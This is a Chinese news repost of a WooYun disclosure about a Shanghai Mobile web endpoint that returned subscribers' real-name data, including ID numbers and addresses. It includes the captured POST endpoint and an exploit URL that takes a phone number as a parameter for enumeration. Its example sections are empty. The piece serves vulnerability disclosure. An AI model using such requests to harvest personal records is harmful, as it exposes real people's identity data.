上海移动所有用户实名制信息可任意查询

网站建设 2021-07-09 17:03www.dzhlxh.cn网站建设

站长基地最新获悉 乌云漏洞平台披露,通过漏洞,上海移动所有用户实名制信息可任意查询(包括身份证号,居住地址等)。目前,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门通报。

以下是漏洞泄露信息过程:

上海移动,换卡不换号

http://www.sh.10086.cn/shop/app?service=page/base.OrderBackUpCard&listener=initPage

需要验证实名制身份证信息,抓包,发现如下POST请求:

http://www.sh.10086.cn/shop/app?service=ajaxDirect/1/base.OrderBackUpCard/base.OrderBackUpCard/javascript/undefined&pagename=base.OrderBackUpCard&eventname=checkBackUpCardLimit&partids=undefined&ajaxSubmitType=post

用户登记的信息竟然直接返回。

利用URL:http://www.sh.10086.cn/shop/app?service=ajaxDirect/1/base.OrderBackUpCard/base.OrderBackUpCard/javascript/undefined&pagename=base.OrderBackUpCard&eventname=checkBackUpCardLimit&partids=undefined&ajaxSubmitType=post&edit_MANAGENUMBER=手机号

可遍历全市用户实名制信息。

例1:

例2:

点到为止,不再遍历。

漏洞证明:

例1:

例2:

Copyright © 2016-2025 www.dzhlxh.cn 金源码 版权所有 Power by

网站模板下载|网络推广|微博营销|seo优化|视频营销|网络营销|微信营销|网站建设|织梦模板|小程序模板